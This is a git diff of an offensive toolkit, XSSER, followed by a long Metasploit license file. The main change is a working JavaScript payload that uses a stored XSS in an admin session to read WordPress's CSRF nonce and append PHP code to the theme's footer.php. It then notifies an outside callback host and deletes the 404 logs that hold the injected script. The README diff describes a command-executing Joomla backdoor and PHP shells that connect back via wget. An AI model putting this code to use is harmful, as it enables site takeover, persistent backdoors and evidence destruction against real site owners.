SetCookie("Themes_Infected","true"); -function SetCookie(cookieName,cookieContent) { - var cookiePath = '/'; - var expDate=new Date(); - 
expDate.setTime(expDate.getTime()+372800000); - var expires=expDate.toGMTString(); - document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; -} - -// NOTE: This function should always be executed after the final stage -// Delete all 404 log errors - Including the injected payload(s) -// This function is specific to the Better WP Security XSS issue -// USAGE: clean_up() -function clean_up() { - document.getElementById('404s').checked=true; - document.forms[0].submit(); -} - -// ============================================= FUNCTIONS END ============================================= \\ - -// USAGE: main_frame_inject("Themes_Infected","silent_themes_frame","silent_themes_inject()","theme-editor.php?file=footer.php"); -// function main_frame_inject(cookiename,identifier,function_name,get_page) -main_frame_inject("Themes_Infected","silent_themes_frame","silent_themes_inject()","theme-editor.php?file=footer.php"); - - -// PAYLOAD END \ No newline at end of file +/* +Title: WordPress Core Payload (Theme) +Author: Hans-Michael Varbaek +Company: VarBITS + +Version: 2.75 + +Changelog: +- Ver 2.75 : Various minor improvements. Version standardized across all files. +- Ver 2.5 : Added XMLHttpRequest for JS Notification. +- Ver 2.5 : request.open() on Line 68 is now set by xsser.py +- Ver 2.0 : First release. + +Special Credits: InterN0T and Sense of Security (Versions 2.0 to 2.5) + +Compatibility Notes: +-- Very old browsers won't support FormData() and XMLHttpRequest() + +Requirements: +1) Ability to edit theme files. (Default feature. However, this is typically disabled in hardened configurations.) + +For ethical and legal purposes only. This script is provided as is and without warranty. 
+ +TODO: +- For pre-existing forms, consider using FormData to read and update/set new values in the future: +https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects +https://developer.mozilla.org/en-US/docs/Web/API/FormData +https://developer.mozilla.org/en-US/docs/Web/API/FormData/set +-- Update or add another payload which uses FormData() and XMLHttpRequest() +*/ + +var php_input = ''; + +// Our iframe function which primarily injects a prepopulated form. +// noinspection JSUnusedGlobalSymbols +function silent_themes_inject() { + //if (document.cookie.indexOf("Themes_Infected") == -1) { + // TODO: Make the "Themes_Infected" cookie name a function argument for silent_themes_inject() + if (!document.cookie.match(/^(.*;)?\s*Themes_Infected\s*=\s*[^;]+(.*)?$/)) { + + // Read and save the relevant "_wpnonce" - Bypass CSRF protection + // TODO: Consider generating the correct "nonce"-reading code below, which depends on the WordPress version in use. + // var themes_wpnonce = document.getElementById('silent_themes_frame').contentDocument.getElementById('template')._wpnonce.value; // WP Nonce / CSRF Token + // Newer versions use "nonce" instead of _wpnonce + // noinspection Annotator + var themes_wpnonce = document.getElementById('silent_themes_frame').contentDocument.getElementById('template').nonce.value; // WP Nonce / CSRF Token + var themes_contents = document.getElementById('silent_themes_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of the file + + // Initiate the form data object + // TODO: Use the pre-existing form in the future if possible. 
+ var formData = new FormData(); + + // Create a variable which holds the current theme data, a new line (Linux format), and then our php payload + var special_content = themes_contents+'\n'+php_input; + + // Prepopulated form with the CSRF ("_wpnonce") token and our PHP payload as specified + formData.append("nonce", themes_wpnonce); // Variable has changed name to "nonce" + formData.append("_wp_http_referer", "%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dfooter.php"); + formData.append("newcontent", special_content); + formData.append("action", "edit-theme-plugin-file"); + formData.append("file", "footer.php"); + formData.append("theme", "twentyseventeen"); + formData.append("docs-list", ""); + + // Initiate XMLHttpRequest + var request_one = new XMLHttpRequest(); + + // Method and URL to send the request to. + request_one.open("POST", "http://TARGETWEBSITE/wp-admin/admin-ajax.php"); // Set by: xsser.py + // Note: The URL has changed since last version, to "admin-ajax.php" in current WP versions. + // TODO: Maybe implement a version enum function to determine which URL request to use. + // Example contents: http://www.some-wordpress-website.tld/wp-admin/theme-editor.php + + // Send the request with our form data. + request_one.send(formData); + + SetCookie("Themes_Infected", "true"); // Prevent re-infection / loops + // TODO: Maybe change the cookie name and value in the future. + + // Notification feature + var request_two = new XMLHttpRequest(); // Initiate XMLHttpRequest + request_two.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); + // Method and URL to send the request to - Hostname and port are set by: xsser.py + request_two.send(); // Send the request + + clean_up(); // Remove initial payload from server + } +} + +// ============================================= FUNCTIONS START ============================================= \\ + +// Injects the main hidden iframe into the page. 
+// USAGE: main_frame_inject("Themes_Infected", "silent_themes_frame", "silent_themes_inject()", "theme-editor.php?file=footer.php"); +function main_frame_inject(cookiename, identifier, function_name, get_page) { + //if (document.cookie.indexOf(cookiename) == -1) { + var re_cookie = new RegExp('^(.*;)?\\s*'+cookiename+'\\s*=\\s*[^;]+(.*)?$'); + if (!document.cookie.match(re_cookie)) { + + // Append a (hidden) iframe to the HTML body for data injection. + var mainframe = document.createElement("iframe"); + mainframe.setAttribute('id', identifier); + top.document.body.appendChild(mainframe); + mainframe.setAttribute('onload', function_name); + mainframe.setAttribute('style', 'visibility:hidden;display:none'); + mainframe.setAttribute('src', get_page); + } +} + +// Sets a cookie with a very long expiration time +// USAGE: SetCookie("Themes_Infected", "true"); +// TODO: Look into HTML5 Storage instead of cookies maybe. +function SetCookie(cookieName, cookieContent) { + var cookiePath = '/'; + var expDate=new Date(); + expDate.setTime(expDate.getTime()+372800000); + var expires=expDate.toUTCString(); + document.cookie=cookieName+"="+encodeURIComponent(cookieContent)+";path="+encodeURI(cookiePath)+";expires="+expires; +} + +// NOTE: This function should always be executed after the final stage +// Delete all 404 log errors - Including the injected payload(s) +// This function is specific to the Better WP Security XSS vulnerability. +// TODO: Replace the contents of this function with a "place-holder" variable in the next version. +// TODO: This variable, is then replaced, depending on the component being exploited. 
+// USAGE: clean_up() +function clean_up() { + // noinspection JSUndefinedPropertyAssignment + document.getElementById('404s').checked=true; + document.forms[0].submit(); +} + +// ============================================= FUNCTIONS END ============================================= \\ + +// USAGE: main_frame_inject("Themes_Infected", "silent_themes_frame", "silent_themes_inject()", "theme-editor.php?file=footer.php"); +// function main_frame_inject(cookiename, identifier, function_name, get_page) +main_frame_inject("Themes_Infected", "silent_themes_frame", "silent_themes_inject()", "theme-editor.php?file=footer.php"); diff --git a/README.md b/README.md index 7d6738b..c7ca372 100644 --- a/README.md +++ b/README.md 
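Review bot: The comment `// Example contents: http://www.some-wordpress-website.tld/wp-admin/theme-editor.php` beneath `request_one.open(...)` in silent_themes_inject is stale now that the POST is sent to `admin-ajax.php` with `action` set to `edit-theme-plugin-file`, so the example no longer matches the line it documents; change it to `// Example contents: http://www.some-wordpress-website.tld/wp-admin/admin-ajax.php`. The changelog entry `- Ver 2.5 : request.open() on Line 68 is now set by xsser.py` also appears one line off by my count of the new file (line 68 is the `// Method and URL to send the request to.` comment and the `request_one.open` call is line 69), and the previous header had the same drift, so naming the call rather than a line number would keep it accurate. The header's `Requirements: 1) Ability to edit theme files. (... typically disabled in hardened configurations.)` would be more useful to anyone assessing exposure if it named the control, e.g. `(Disabled when DISALLOW_FILE_EDIT is set, which removes the theme/plugin editor this payload depends on.)`.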
@@ -1,33 +1,49 @@ XSSER ========== -Black Hat Arsenal +Black Hat Arsenal -Black Hat Arsenal +Black Hat Arsenal + +Black Hat Arsenal ### Presentation -* From XSS to RCE 2.5 - Black Hat Europe Arsenal 2016 +* From XSS to RCE 2.75 - Black Hat Europe Arsenal 2017 ### Demo -* Version 2.0 - 2015: https://www.youtube.com/playlist?list=PLIjb28IYMQgqqqApoGRCZ_O40vP-eKsgf -* Version 2.5 - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj +* Version 2.0 - 2015: https://www.youtube.com/playlist?list=PLIjb28IYMQgqqqApoGRCZ_O40vP-eKsgf +* Version 2.5 - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj +* Version 2.75 - 2017: None Currently Available Requirements ------------ -* Python (2.7.*, version 2.7.11 was used for development and demo) -* Gnome -* Bash +* Python (2.7.*, version `2.7.14` was used for development and testing) * Msfconsole (accessible via environment variables) * Netcat (nc) -* cURL (curl) [NEW] -* PyGame (apt-get install python-pygame) [NEW] +* PyGame (pip install pygame) +* jsmin (new dependency - pip install jsmin) +* xterm (previously gnome and bash) + +To install the Python dependencies, you can run the following command: + +`pip install -r requirements.txt` + +If you're using a virtual environment, then you may need to use the full list: + +`pip install -r requirements-all-libraries-used.txt` For installation instructions on Ubuntu 16.04.1 LTS, please refer to the wiki: https://github.com/Varbaek/xsser/wiki +Removed Dependencies: +------------ +* Gnome (switched to xterm) +* Bash (only tested in bash, but should work in other terminals) +* cURL (switched to native python requests) + Payload Compatibility ------------ -* Chrome (14 Nov 2015) - This should still work. -* Firefox (04 Nov 2016) - Tested live at Black Hat Arsenal 2016 +* Chrome (2018) - Tested live at Black Hat Arsenal 2017 and during extras development. 
+* Firefox - Untested - Should still work as available JS features are almost the same. WordPress Lab ------------------ @@ -52,21 +68,26 @@ Directories ------------ * Audio: Contains remixed audio notifications. * Exploits: Contains DirtyCow (DCOW) privilege escalation exploits. -* Joomla_Backdoor: Contains a sample Joomla extension backdoor which can be uploaded as an administrator and subsequently used to execute arbitrary commands on the system with system($_GET['c']). -* Payloads/javascript: Contains the JavaScript payloads. Contains a new "add new admin" payload for Joomla. -* Shells: Contains the PHP shells to inject, including a slightly modified version of pentestmonkey's shell that connects back via wget. +* Hello_Shell: Contains a Joomla extension backdoor, which can be uploaded as an administrator and + subsequently used to execute arbitrary commands on the system with ?c=ls or ?c64=base64_here. + This directory was originally placed in "Joomla_Backdoor". +* Payloads/javascript: Contains the JavaScript payloads. +* Received_Data: Empty directory which will be used in future versions. +* Shells: Contains the PHP shells, including a slightly modified version of pentestmonkey's shell that + connects back via wget to send the attacker a notification of success. Developed By ------------ * Hans-Michael Varbaek -* Sense of Security +* VarBITS -Credits +Special Credits ------------ * MaXe / InterN0T +* Sense of Security (Versions 2.0 - 2.5) Code Design ----------- * It works! (Again!) -* Spaghetti code -* Just-In-Time for Black Hat Europe 2016 +* Still spaghetti code, but now with almost complete `PEP8` and possible refactoring in the future. +* Just-In-Time for Black Hat Europe 2017 diff --git a/Shells/meterpreter/LICENSE b/Shells/meterpreter/LICENSE index 4dfde19..7daee05 100644 --- a/Shells/meterpreter/LICENSE +++ b/Shells/meterpreter/LICENSE 
@@ -1,987 +1,987 @@ -https://github.com/rapid7/metasploit-framework/blob/master/LICENSE - -Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ -Source: http://www.metasploit.com/ - -Files: * -Copyright: 2006-2016, Rapid7, Inc. -License: BSD-3-clause - -# The Metasploit Framework is provided under the 3-clause BSD license provided -# at the end of this file. -# -# The copyright on this package is held by Rapid7, Inc. -# -# This license does not apply to third-party components detailed below. -# -# Last updated: 2013-Nov-04 -# - -Files: data/templates/to_mem_pshreflection.ps1.template -Copyright: 2012, Matthew Graeber -License: BSD-3-clause - -Files: data/john/* -Copyright: 1996-2011 Solar Designer. -License: GPL-2 - -Files: external/pcaprub/* -Copyright: 2007-2008, Alastair Houghton -License: LGPL-2.1 - -Files: external/ruby-kissfft/* -Copyright: 2003-2010 Mark Borgerding - 2009-2012 H D Moore -License: BSD-3-clause - -Files: external/source/exploits/IE11SandboxEscapes/* -Copyright: James Forshaw, 2014 -License: GPLv3 - -Files: external/source/byakugan/* -Copyright: Lurene Grenier, 2009 -License: BSD-3-clause - -Files: external/source/ipwn/* -Copyright: 2004-2005 vlad902 - 2007 H D Moore -License: GPL-2 and Artistic - -Files: external/source/ReflectiveDLLInjection/* -Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -License: BSD-3-clause - -Files: external/source/metsvc/* -Copyright: 2007, Determina Inc. -License: BSD-3-clause - -Files: external/source/tightvnc/* -Copyright: 1999 AT&T Laboratories Cambridge. - 2000 Tridia Corp. - 2002-2003 RealVNC Ltd. - 2001-2004 HorizonLive.com, Inc. - 2000-2007 Constantin Kaplinsky - 2000-2009 TightVNC Group -License: GPL-2 - -Files: external/source/unixasm/* -Copyright: 2004-2008 Ramon de Carvalho Valle -License: BSD-4-clause - -Files: external/source/vncdll/winvnc/* -Copyright: 1999 AT&T Laboratories Cambridge. - 2000 Tridia Corp. - 2002-2003 RealVNC Ltd. 
- 2001-2004 HorizonLive.com, Inc. - 2000-2006 Constantin Kaplinsky. - 2000-2009 TightVNC Group -License: GPL-2 - -Files: lib/anemone.rb lib/anemone/* -Copyright: 2009 Vertive, Inc. -License: MIT - -Files: lib/bit-struct.rb lib/bit-struct/* -Copyright: 2005-2009, Joel VanderWerf -License: Ruby - -Files: lib/metasm.rb lib/metasm/* data/cpuinfo/* -Copyright: 2006-2010 Yoann GUILLOT -License: LGPL-2.1 - -Files: lib/nessus/* -Copyright: Vlatoko Kosturjak -License: BSD-3-clause - -Files: lib/net/dns.rb lib/net/dns/* -Copyright: 2006 Marco Ceresa -License: Ruby - -Files: lib/net/ssh.rb lib/net/ssh/* -Copyright: 2008 Jamis Buck -License: MIT - -Files: lib/packetfu.rb lib/packetfu/* -Copyright: 2008-2012 Tod Beardsley -License: BSD-3-clause - -Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb -Copyright: 2005 Michael Neumann -License: BSD-3-clause or Ruby - -Files: lib/openvas/* -Copyright: No copyright statement provided -License: MIT - -Files: lib/rabal/* -Copyright: Jeremy Hinegadner -License: Ruby - -Files: lib/rbmysql.rb lib/rbmysql/* -Copyright: 2009 tommy -License: Ruby - -Files: lib/rbreadline.rb -Copyright: 2009 Park Heesob -License: BSD-3-clause - -Files: lib/rkelly/* -Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette -License: MIT - -Files: lib/snmp.rb lib/snmp/* -Copyright: 2004, David R. Halliday -License: Ruby - -Files: lib/sshkey.rb lib/sshkey/* -Copyright: 2011 James Miller -License: MIT - -Files: lib/windows_console_color_support.rb -Copyright: 2011 Michael 'mihi' Schierl -License: BSD-3-clause - -Files: lib/zip.rb lib/zip/* -Copyright: 2002-2004, Thomas Sandergaard -License: Ruby - -Files: modules/payloads/singles/windows/speak_pwned.rb -Copyright: 2009-2010 Berend-Jan "SkyLined" Wever -License: BSD-3-clause - -Files: data/webcam/api.js -Copyright: Copyright 2013 Muaz Khan<@muazkh>. 
-License: MIT - - -# -# Gems -# - -Files: activemodel -Copyright: 2004-2011 David Heinemeier Hansson -License: MIT - -Files: activerecord -Copyright: 2004-2011 David Heinemeier Hansson -License: MIT - -Files: activesupport -Copyright: 2005-2011 David Heinemeier Hansson -License: MIT - -Files: arel -Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson -License: MIT - -Files: bcrypt -Copyright: 2007-2011 Coda Hale -License: MIT - -Files: builder -Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com) -License: MIT - -Files: database_cleaner -Copyright: 2009 Ben Mabey -License: MIT - -Files: diff-lcs -Copyright: 2004-2011 Austin Ziegler -License: MIT - -Files: factory_girl -Copyright: 2008-2013 Joe Ferris and thoughtbot, inc. -License: MIT - -Files: fivemat -Copyright: 2012 Tim Pope -License: MIT - -Files: i18n -Copyright: 2008 The Ruby I18n team -License: MIT - -Files: json -Copyright: Daniel Luz -License: Ruby - -Files: metasploit_data_models -Copyright: 2012 Rapid7, Inc. -License: MIT - -Files: mini_portile -Copyright: 2011 Luis Lavena -License: MIT - -Files: msgpack -Copyright: Austin Ziegler -License: Ruby - -Files: multi_json -Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc. -License: MIT - -Files: network_interface -Copyright: 2012, Rapid7, Inc. 
-License: MIT - -Files: nokogiri -Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada -License: MIT - -Files: packetfu -Copyright: 2008-2012 Tod Beardsley -License: BSD-3-clause - -Files: pcaprub -Copyright: 2007-2008, Alastair Houghton -License: LGPL-2.1 - -Files: pg -Copyright: 1997-2012 by the authors -License: Ruby - -Files: rake -Copyright: 2003, 2004 Jim Weirich -License: MIT - -Files: redcarpet -Copyright: 2009 Natacha Porté -License: MIT - -Files: robots -Copyright: 2008 Kyle Maxwell, contributors -License: MIT - -Files: rspec -Copyright: 2009 Chad Humphries, David Chelimsky -License: MIT - -Files: shoulda-matchers -Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc. -License: MIT - -Files: simplecov -Copyright: 2010-2012 Christoph Olszowka -License: MIT - -Files: timecop -Copyright: 2012 Travis Jeffery, John Trupiano -License: MIT - -Files: tzinfo -Copyright: 2005-2006 Philip Ross -License: MIT - -Files: yard -Copyright: 2007-2013 Loren Segal -License: MIT - - -License: BSD-2-clause - Redistribution and use in source and binary forms, with or without modification, - are permitted provided that the following conditions are met: - . - Redistributions of source code must retain the above copyright notice, this - list of conditions and the following disclaimer. - . - Redistributions in binary form must reproduce the above copyright notice, this - list of conditions and the following disclaimer in the documentation and/or - other materials provided with the distribution. - . - THIS SOFTWARE IS PROVIDED BY {{THE COPYRIGHT HOLDERS AND CONTRIBUTORS}} "AS IS" - AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - DISCLAIMED. 
IN NO EVENT SHALL {{THE COPYRIGHT HOLDER OR CONTRIBUTORS}} BE - LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE - GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) - HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT - LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT - OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -License: BSD-3-clause - Redistribution and use in source and binary forms, with or without modification, - are permitted provided that the following conditions are met: - . - * Redistributions of source code must retain the above copyright notice, - this list of conditions and the following disclaimer. - . - * Redistributions in binary form must reproduce the above copyright notice, - this list of conditions and the following disclaimer in the documentation - and/or other materials provided with the distribution. - . - * Neither the name of Rapid7, Inc. nor the names of its contributors - may be used to endorse or promote products derived from this software - without specific prior written permission. - . - THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND - ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED - WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR - ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES - (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON - ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -License: BSD-4-clause - Redistribution and use in source and binary forms, with or without - modification, are permitted provided that the following conditions are met: - 1. Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - 2. Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - 3. All advertising materials mentioning features or use of this software - must display the following acknowledgement: - This product includes software developed by the . - 4. Neither the name of the nor the - names of its contributors may be used to endorse or promote products - derived from this software without specific prior written permission. - . - THIS SOFTWARE IS PROVIDED BY ''AS IS'' AND ANY - EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED - WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - DISCLAIMED. 
IN NO EVENT SHALL BE LIABLE FOR ANY - DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES - (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND - ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -License: Ruby - 1. You may make and give away verbatim copies of the source form of the - software without restriction, provided that you duplicate all of the - original copyright notices and associated disclaimers. - . - 2. You may modify your copy of the software in any way, provided that - you do at least ONE of the following: - . - a) place your modifications in the Public Domain or otherwise - make them Freely Available, such as by posting said - modifications to Usenet or an equivalent medium, or by allowing - the author to include your modifications in the software. - . - b) use the modified software only within your corporation or - organization. - . - c) rename any non-standard executables so the names do not conflict - with standard executables, which must also be provided. - . - d) make other distribution arrangements with the author. - . - 3. You may distribute the software in object code or executable - form, provided that you do at least ONE of the following: - . - a) distribute the executables and library files of the software, - together with instructions (in the manual page or equivalent) - on where to get the original distribution. - . - b) accompany the distribution with the machine-readable source of - the software. - . - c) give non-standard executables non-standard names, with - instructions on where to get the original software distribution. - . - d) make other distribution arrangements with the author. - . - 4. 
You may modify and include the part of the software into any other - software (possibly commercial). But some files in the distribution - are not written by the author, so that they are not under this terms. - They are gc.c(partly), utils.c(partly), regex.[ch], fnmatch.[ch], - glob.c, st.[ch] and some files under the ./missing directory. See - each file for the copying condition. - . - 5. The scripts and library files supplied as input to or produced as - output from the software do not automatically fall under the - copyright of the software, but belong to whomever generated them, - and may be sold commercially, and may be aggregated with this - software. - . - 6. THIS SOFTWARE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR - IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED - WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR - PURPOSE. - -License: GPL-2 - This program is free software; you can redistribute it - and/or modify it under the terms of the GNU General Public - License as published by the Free Software Foundation; either - version 2 of the License, or (at your option) any later - version. - . - This program is distributed in the hope that it will be - useful, but WITHOUT ANY WARRANTY; without even the implied - warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR - PURPOSE. See the GNU General Public License for more - details. - . - You should have received a copy of the GNU General Public - License along with this package; if not, write to the Free - Software Foundation, Inc., 51 Franklin St, Fifth Floor, - Boston, MA 02110-1301 USA - . - On Debian systems, the full text of the GNU General Public - License version 2 can be found in the file - `/usr/share/common-licenses/GPL-2'. 
- -License: LGPL-2.1 - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - . - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - . - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - -License: OpenSSL - Redistribution and use in source and binary forms, with or without - modification, are permitted provided that the following conditions - are met: - . - 1. Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - . - 2. Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in - the documentation and/or other materials provided with the - distribution. - . - 3. All advertising materials mentioning features or use of this - software must display the following acknowledgment: - "This product includes software developed by the OpenSSL Project - for use in the OpenSSL Toolkit. (http://www.openssl.org/)" - . - 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to - endorse or promote products derived from this software without - prior written permission. For written permission, please contact - openssl-core@openssl.org. - . - 5. Products derived from this software may not be called "OpenSSL" - nor may "OpenSSL" appear in their names without prior written - permission of the OpenSSL Project. - . - 6. 
Redistributions of any form whatsoever must retain the following - acknowledgment: - "This product includes software developed by the OpenSSL Project - for use in the OpenSSL Toolkit (http://www.openssl.org/)" - . - THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT `AS IS'' AND ANY - EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR - PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR - ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, - SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT - NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) - HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, - STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED - OF THE POSSIBILITY OF SUCH DAMAGE. - . - This product includes cryptographic software written by Eric Young - (eay@cryptsoft.com). This product includes software written by Tim - Hudson (tjh@cryptsoft.com). - -License: SSLeay - This package is an SSL implementation written - by Eric Young (eay@cryptsoft.com). - The implementation was written so as to conform with Netscapes SSL. - . - This library is free for commercial and non-commercial use as long as - the following conditions are aheared to. The following conditions - apply to all code found in this distribution, be it the RC4, RSA, - lhash, DES, etc., code; not just the SSL code. The SSL documentation - included with this distribution is covered by the same copyright terms - except that the holder is Tim Hudson (tjh@cryptsoft.com). - . - Copyright remains Eric Young's, and as such any Copyright notices in - the code are not to be removed. - If this package is used in a product, Eric Young should be given attribution - as the author of the parts of the library used. 
- This can be in the form of a textual message at program startup or - in documentation (online or textual) provided with the package. - . - Redistribution and use in source and binary forms, with or without - modification, are permitted provided that the following conditions - are met: - 1. Redistributions of source code must retain the copyright - notice, this list of conditions and the following disclaimer. - 2. Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - 3. All advertising materials mentioning features or use of this software - must display the following acknowledgement: - "This product includes cryptographic software written by - Eric Young (eay@cryptsoft.com)" - The word 'cryptographic' can be left out if the rouines from the library - being used are not cryptographic related :-). - 4. If you include any Windows specific code (or a derivative thereof) from - the apps directory (application code) you must include an acknowledgement: - "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" - . - THIS SOFTWARE IS PROVIDED BY ERIC YOUNG `AS IS'' AND - ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE - FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS - OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) - HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT - LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY - OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF - SUCH DAMAGE. - . 
- The licence and distribution terms for any publically available version or - derivative of this code cannot be changed. i.e. this code cannot simply be - copied and put under another distribution licence - [including the GNU Public Licence.] - -License: MIT - Permission is hereby granted, free of charge, to any person obtaining - a copy of this software and associated documentation files (the - "Software"), to deal in the Software without restriction, including - without limitation the rights to use, copy, modify, merge, publish, - distribute, sublicense, and/or sell copies of the Software, and to - permit persons to whom the Software is furnished to do so, subject to - the following conditions: - . - The above copyright notice and this permission notice shall be - included in all copies or substantial portions of the Software. - . - THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, - EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF - MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND - NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE - LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION - OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION - WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -License: Artistic - Copyright (c) 2000-2006, The Perl Foundation. - . - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - . - Preamble - . - This license establishes the terms under which a given free software - Package may be copied, modified, distributed, and/or redistributed. - The intent is that the Copyright Holder maintains some artistic - control over the development of that Package while still keeping the - Package available as open source and free software. - . 
